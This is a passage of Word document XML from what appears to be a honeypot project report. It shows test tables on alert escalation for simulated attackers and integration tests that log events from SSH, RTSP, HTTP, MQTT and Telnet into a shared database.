      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH alert, then CRITICAL multi-protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IP=10.30.0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Second alert sent as ESCALATION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MULTI_PROTOCOL_ATTACK CRITICAL sent with ESCALATION prefix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">* Status disabled means the channel had no bot token / SMTP account in the test environment; with credentials configured the status is sent. The decision logic (one alert, not dozens) is identical.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4206240" cy="3023415"/>
            <wp:docPr id="41" name="Picture 41"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="term_alerts.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4206240" cy="3023415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3682" w14:textId="7FA23AD5" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">38</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Alert Decisions per Attacker IP after the Simulator Run (one alert per IP per channel)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF48B6F" w14:textId="54F0A1AE" w:rsidR="003272AD" w:rsidRPr="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9050" w:name="_Toc69050"/>
      <w:r>
        <w:t xml:space="preserve">8.4 Integration Testing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9050"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Integration testing verifies that the services work together and that data flows end-to-end from the attacker connection to the dashboard. Tests HB-INT-006 to HB-INT-008 were executed on the Windows Docker Desktop deployment; the others on the laboratory stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">30</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Integration Test Cases</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpYSpec="inside"/>
        <w:tblW w:w="11146" w:type="dxa"/>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CellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="641"/>
        <w:gridCol w:w="974"/>
        <w:gridCol w:w="1466"/>
        <w:gridCol w:w="1396"/>
        <w:gridCol w:w="1575"/>
        <w:gridCol w:w="1114"/>
        <w:gridCol w:w="1513"/>
        <w:gridCol w:w="1709"/>
        <w:gridCol w:w="758"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="39D0FE0D" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="518"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Preconditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Input</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Expected Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Actual Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-INT-001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">All honeypots → PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify every protocol writes through the unified event store</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack running</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Simulator run; SELECT protocol, count(*) FROM events GROUP BY protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">6 simulated attackers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Events for all 5 protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH 468, RTSP 354, HTTP 290, MQTT 96, Telnet 67 events (1,275); 264 sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-INT-002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP → Redis → SSH, MQTT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify one device state across protocols</w:t>
            </w:r>
